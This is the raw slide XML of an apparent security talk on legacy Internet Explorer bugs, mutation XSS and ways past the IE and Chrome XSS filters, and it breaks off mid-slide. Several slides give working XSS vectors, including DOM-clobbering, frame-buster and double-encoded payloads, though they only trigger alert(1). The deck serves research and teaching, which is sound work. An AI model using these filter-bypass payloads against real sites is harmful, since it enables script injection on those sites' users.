            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The title mutates in the print preview!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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Real world 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8" name="Content Placeholder 7" descr="print-preview.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="745558" y="1600200"/>
            <a:ext cx="7652883" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="blood-splat2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"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Mutation XSS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How can we simulate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All you need is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+=‘’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reads and writes HTML causing mutation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Multiple read/writes cause multiple levels of mutation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is there a tool for that?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Of course:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://businessinfo.co.uk/labs/mxss/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buNone/>
            </a:pPr>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About me</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Researcher for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Portswigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (makers of Burp suite)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript XSS hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I love JavaScript sandboxes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Built </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MentalJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a JavaScript parser/sandbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Worked for Microsoft for 5 years testing the IE XSS filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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5" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="-2259632"/>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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>LEGacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> IE bugs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Anchors with id’s can be manipulated using the global variable referencing that object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E.g. &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“123” id=“x”&gt;test&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;x=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1)’&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Global variable causes assignment to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> property of the anchor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anchor contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Works in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>compat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> mode in IE</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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>LEGacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> IE bugs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You can reassign functions from within the arguments of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> function call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If XSS occurs within the arguments of a function you can bypass the IE XSS filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>someFunc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(XSS HERE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>someFunct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1,someFunct=alert)</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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>LEGacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> IE bugs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Frame busters can be attacked using DOM clobbering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We can overwrite references to location so that other DOM objects are used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Classic frame buster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>top.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>self.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>self.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>top.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>LEGacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> IE bugs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If we can control the “top” object then we can execute XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;form id=top location=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection must occur before the frame buster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Because the attribute is html decoded and location assignment is also decoded we can double encode our vector!</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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>LEGacy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:srgbClr val="FF0000">
                      <a:alpha val="40000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="ZOMBIFIED" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> IE bugs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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If we can control the “top” object then we can execute XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;form id=top location=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection must occur before the frame buster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Because the attribute is html decoded and location assignment is also decoded we can double encode our vector!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;form id=top location=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript&amp;amp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;#58;alert(1)&gt;</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XSS Filter bypasses</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="blood-splat2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339752" y="-1971600"/>
            <a:ext cx="6981825" cy="4924425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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Inside a script block &lt;script&gt;x=“INJECTION”&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I can bypass the Chrome XSS filter using &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS auditor doesn’t support script based injections however I can inject a HTML based vector that uses a closing &lt;/script&gt; block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>svg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;script&gt;alert(1)+&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="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XSS Filter bypasses</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="blood-splat2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2339752" y="-1971600"/>
            <a:ext cx="6981825" cy="4924425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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Another XSS auditor bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If injection occurs within an attribute and a script occurs after the injection I can bypass the filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script/</a:t>
            </a:r>
            <a:r>
